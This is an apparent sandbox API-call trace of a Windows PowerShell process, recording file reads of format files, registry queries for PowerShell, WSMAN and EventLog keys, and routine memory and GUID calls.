	[0664.693] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x8c9735c, Data2=0x25ee, Data3=0x4cad, Data4=([0]=0x9a, [1]=0x3, [2]=0x8b, [3]=0xb2, [4]=0x9a, [5]=0x93, [6]=0x45, [7]=0x98))) returned 0x0
	[0664.694] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xf366b822, Data2=0x7b3, Data3=0x49d9, Data4=([0]=0x9d, [1]=0xee, [2]=0xe0, [3]=0x59, [4]=0x84, [5]=0x84, [6]=0x30, [7]=0x74))) returned 0x0
	[0664.694] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x68c1345, Data2=0xdec3, Data3=0x4eac, Data4=([0]=0x8e, [1]=0xea, [2]=0xb1, [3]=0x37, [4]=0x79, [5]=0x6e, [6]=0x58, [7]=0xc))) returned 0x0
	[0664.694] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x9205f139, Data2=0x52b2, Data3=0x4b07, Data4=([0]=0xb0, [1]=0xed, [2]=0x1a, [3]=0x70, [4]=0xb1, [5]=0x40, [6]=0x61, [7]=0xac))) returned 0x0
	[0664.694] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x5359aaa3, Data2=0xf226, Data3=0x4153, Data4=([0]=0x88, [1]=0x3d, [2]=0x59, [3]=0x15, [4]=0xe0, [5]=0x34, [6]=0x61, [7]=0x9a))) returned 0x0
	[0664.694] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x79d60134, Data2=0xc955, Data3=0x4037, Data4=([0]=0x94, [1]=0x44, [2]=0xc7, [3]=0x4, [4]=0x32, [5]=0xd0, [6]=0x55, [7]=0x70))) returned 0x0
	[0664.694] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x5ce9aa93, Data2=0xa158, Data3=0x4bc6, Data4=([0]=0x8b, [1]=0x9, [2]=0x38, [3]=0xe6, [4]=0xda, [5]=0x41, [6]=0x94, [7]=0x59))) returned 0x0
	[0664.695] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x767e3b1b, Data2=0xc0fd, Data3=0x4fec, Data4=([0]=0xae, [1]=0x46, [2]=0xb1, [3]=0x95, [4]=0xad, [5]=0xe9, [6]=0x56, [7]=0xd3))) returned 0x0
	[0664.695] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0664.695] GetFileType (hFile=0x2fc) returned 0x1
	[0664.695] SetErrorMode (uMode=0x1) returned 0x1
	[0664.695] GetFileType (hFile=0x2fc) returned 0x1
	[0664.695] ReadFile (in: hFile=0x2fc, lpBuffer=0x3257120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3257120*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0664.696] ReadFile (in: hFile=0x2fc, lpBuffer=0x3257120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3257120*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0664.696] ReadFile (in: hFile=0x2fc, lpBuffer=0x3257120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3257120*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0664.697] ReadFile (in: hFile=0x2fc, lpBuffer=0x3257120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3257120*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0664.697] ReadFile (in: hFile=0x2fc, lpBuffer=0x3257120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3257120*, lpNumberOfBytesRead=0x16d338*=0x8b4, lpOverlapped=0x0) returned 1
	[0664.697] ReadFile (in: hFile=0x2fc, lpBuffer=0x325653c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x325653c*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0664.697] ReadFile (in: hFile=0x2fc, lpBuffer=0x3257120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3257120*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0664.698] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3c8 | out: phkResult=0x16d3c8*=0x2fc) returned 0x0
	[0664.698] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d34c, lpData=0x0, lpcbData=0x16d348*=0x0 | out: lpType=0x16d34c*=0x1, lpData=0x0, lpcbData=0x16d348*=0x56) returned 0x0
	[0664.698] CoTaskMemAlloc (cb=0x5a) returned 0x2f7cd0
	[0664.698] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d31c, lpData=0x2f7cd0, lpcbData=0x16d318*=0x56 | out: lpType=0x16d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d318*=0x56) returned 0x0
	[0664.698] CoTaskMemFree (pv=0x2f7cd0) 
	[0664.698] RegCloseKey (hKey=0x2fc) returned 0x0
	[0664.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0664.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0664.699] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x5f038592, Data2=0xe511, Data3=0x4ae0, Data4=([0]=0xab, [1]=0xe4, [2]=0x7e, [3]=0x31, [4]=0xc6, [5]=0x6, [6]=0xf3, [7]=0x95))) returned 0x0
	[0664.699] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x4dec4805, Data2=0x195, Data3=0x4584, Data4=([0]=0x8e, [1]=0x85, [2]=0xfd, [3]=0x95, [4]=0xca, [5]=0xb, [6]=0x9d, [7]=0x62))) returned 0x0
	[0664.699] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0664.699] GetFileType (hFile=0x2fc) returned 0x1
	[0664.699] SetErrorMode (uMode=0x1) returned 0x1
	[0664.700] GetFileType (hFile=0x2fc) returned 0x1
	[0664.700] ReadFile (in: hFile=0x2fc, lpBuffer=0x3294f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3294f08*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0664.702] ReadFile (in: hFile=0x2fc, lpBuffer=0x3294f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3294f08*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0664.702] ReadFile (in: hFile=0x2fc, lpBuffer=0x3294f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3294f08*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0664.702] ReadFile (in: hFile=0x2fc, lpBuffer=0x3294f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3294f08*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0664.703] ReadFile (in: hFile=0x2fc, lpBuffer=0x3294f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3294f08*, lpNumberOfBytesRead=0x16d338*=0xe98, lpOverlapped=0x0) returned 1
	[0664.703] ReadFile (in: hFile=0x2fc, lpBuffer=0x3294508, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3294508*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0664.703] ReadFile (in: hFile=0x2fc, lpBuffer=0x3294f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3294f08*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0664.704] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3c8 | out: phkResult=0x16d3c8*=0x2fc) returned 0x0
	[0664.704] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d34c, lpData=0x0, lpcbData=0x16d348*=0x0 | out: lpType=0x16d34c*=0x1, lpData=0x0, lpcbData=0x16d348*=0x56) returned 0x0
	[0664.704] CoTaskMemAlloc (cb=0x5a) returned 0x2f7cd0
	[0664.704] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d31c, lpData=0x2f7cd0, lpcbData=0x16d318*=0x56 | out: lpType=0x16d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d318*=0x56) returned 0x0
	[0664.704] CoTaskMemFree (pv=0x2f7cd0) 
	[0664.704] RegCloseKey (hKey=0x2fc) returned 0x0
	[0664.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0664.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0664.705] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x84d6b12a, Data2=0x9176, Data3=0x4537, Data4=([0]=0x81, [1]=0x9e, [2]=0x8c, [3]=0x72, [4]=0x5, [5]=0x64, [6]=0x64, [7]=0xdf))) returned 0x0
	[0664.705] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x3e4106a8, Data2=0x9a72, Data3=0x438a, Data4=([0]=0x88, [1]=0x37, [2]=0xaa, [3]=0x3d, [4]=0xcc, [5]=0x1f, [6]=0x66, [7]=0xcf))) returned 0x0
	[0666.555] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0666.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0666.555] CoTaskMemFree (pv=0x2f94d0) 
	[0666.557] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0666.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0666.557] CoTaskMemFree (pv=0x2f94d0) 
	[0666.558] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0666.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0666.559] CoTaskMemFree (pv=0x2f94d0) 
	[0666.560] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0666.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0666.560] CoTaskMemFree (pv=0x2f94d0) 
	[0666.574] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0666.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0666.574] CoTaskMemFree (pv=0x2f94d0) 
	[0666.577] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0666.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0666.577] CoTaskMemFree (pv=0x2f94d0) 
	[0666.578] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0666.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0666.578] CoTaskMemFree (pv=0x2f94d0) 
	[0666.586] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x2fc) returned 0x0
	[0666.588] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d4dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d4d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d4dc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d4d8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0666.588] CoTaskMemFree (pv=0x0) 
	[0666.589] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0666.589] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x0, lpValueName=0x293a20, lpcchValueName=0x16d588, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d588, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0666.589] CoTaskMemFree (pv=0x293a20) 
	[0666.589] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0666.589] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x1, lpValueName=0x293a20, lpcchValueName=0x16d588, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d588, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0666.589] CoTaskMemFree (pv=0x293a20) 
	[0666.589] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0666.589] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x2, lpValueName=0x293a20, lpcchValueName=0x16d588, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d588, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0666.589] CoTaskMemFree (pv=0x293a20) 
	[0666.589] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d56c, lpData=0x0, lpcbData=0x16d568*=0x0 | out: lpType=0x16d56c*=0x1, lpData=0x0, lpcbData=0x16d568*=0x8) returned 0x0
	[0666.589] CoTaskMemAlloc (cb=0xc) returned 0x2fdbd0
	[0666.589] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d53c, lpData=0x2fdbd0, lpcbData=0x16d538*=0x8 | out: lpType=0x16d53c*=0x1, lpData="2.0", lpcbData=0x16d538*=0x8) returned 0x0
	[0666.590] CoTaskMemFree (pv=0x2fdbd0) 
	[0668.368] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d528 | out: phkResult=0x16d528*=0x314) returned 0x0
	[0668.368] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d42c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d428, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d42c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d428*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0668.368] CoTaskMemFree (pv=0x0) 
	[0668.368] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0668.368] RegEnumValueW (in: hKey=0x314, dwIndex=0x0, lpValueName=0x293a20, lpcchValueName=0x16d4d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d4d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0668.368] CoTaskMemFree (pv=0x293a20) 
	[0668.368] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0668.368] RegEnumValueW (in: hKey=0x314, dwIndex=0x1, lpValueName=0x293a20, lpcchValueName=0x16d4d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d4d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0668.369] CoTaskMemFree (pv=0x293a20) 
	[0668.369] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0668.369] RegEnumValueW (in: hKey=0x314, dwIndex=0x2, lpValueName=0x293a20, lpcchValueName=0x16d4d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d4d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0668.369] CoTaskMemFree (pv=0x293a20) 
	[0668.369] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d4bc, lpData=0x0, lpcbData=0x16d4b8*=0x0 | out: lpType=0x16d4bc*=0x1, lpData=0x0, lpcbData=0x16d4b8*=0x8) returned 0x0
	[0668.369] CoTaskMemAlloc (cb=0xc) returned 0x2fdd30
	[0668.369] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d48c, lpData=0x2fdd30, lpcbData=0x16d488*=0x8 | out: lpType=0x16d48c*=0x1, lpData="2.0", lpcbData=0x16d488*=0x8) returned 0x0
	[0668.369] CoTaskMemFree (pv=0x2fdd30) 
	[0670.166] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0670.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0670.166] CoTaskMemFree (pv=0x2f94d0) 
	[0670.172] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0670.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0670.172] CoTaskMemFree (pv=0x2f94d0) 
	[0670.178] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d558 | out: phkResult=0x16d558*=0x2d8) returned 0x0
	[0670.183] RegQueryInfoKeyW (in: hKey=0x2d8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d4cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d4c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d4cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d4c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0670.183] CoTaskMemFree (pv=0x0) 
	[0670.184] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0670.184] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x0, lpName=0x293a20, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0670.184] CoTaskMemFree (pv=0x293a20) 
	[0670.184] CoTaskMemFree (pv=0x0) 
	[0670.184] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0670.184] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x1, lpName=0x293a20, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0670.184] CoTaskMemFree (pv=0x293a20) 
	[0670.184] CoTaskMemFree (pv=0x0) 
	[0670.184] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0670.184] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x2, lpName=0x293a20, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0670.184] CoTaskMemFree (pv=0x293a20) 
	[0670.185] CoTaskMemFree (pv=0x0) 
	[0670.185] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0670.185] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x3, lpName=0x293a20, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0670.185] CoTaskMemFree (pv=0x293a20) 
	[0670.185] CoTaskMemFree (pv=0x0) 
	[0670.185] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0670.185] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x4, lpName=0x293a20, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0670.185] CoTaskMemFree (pv=0x293a20) 
	[0670.185] CoTaskMemFree (pv=0x0) 
	[0670.185] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0670.185] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x5, lpName=0x293a20, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0670.185] CoTaskMemFree (pv=0x293a20) 
	[0670.185] CoTaskMemFree (pv=0x0) 
	[0670.185] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0670.185] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x6, lpName=0x293a20, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0670.185] CoTaskMemFree (pv=0x293a20) 
	[0670.185] CoTaskMemFree (pv=0x0) 
	[0670.186] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0670.186] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x7, lpName=0x293a20, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0670.186] CoTaskMemFree (pv=0x293a20) 
	[0670.186] CoTaskMemFree (pv=0x0) 
	[0670.186] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0670.186] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x8, lpName=0x293a20, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0670.186] CoTaskMemFree (pv=0x293a20) 
	[0670.186] CoTaskMemFree (pv=0x0) 
	[0670.186] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x2dc) returned 0x0
	[0670.186] RegOpenKeyExW (in: hKey=0x2dc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x0) returned 0x2
	[0670.186] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x31c) returned 0x0
	[0670.186] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x0) returned 0x2
	[0670.186] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x320) returned 0x0
	[0670.187] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x0) returned 0x2
	[0670.187] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x324) returned 0x0
	[0670.187] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x0) returned 0x2
	[0670.187] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x328) returned 0x0
	[0670.187] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x0) returned 0x2
	[0670.187] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x32c) returned 0x0
	[0670.187] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x0) returned 0x2
	[0670.187] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x330) returned 0x0
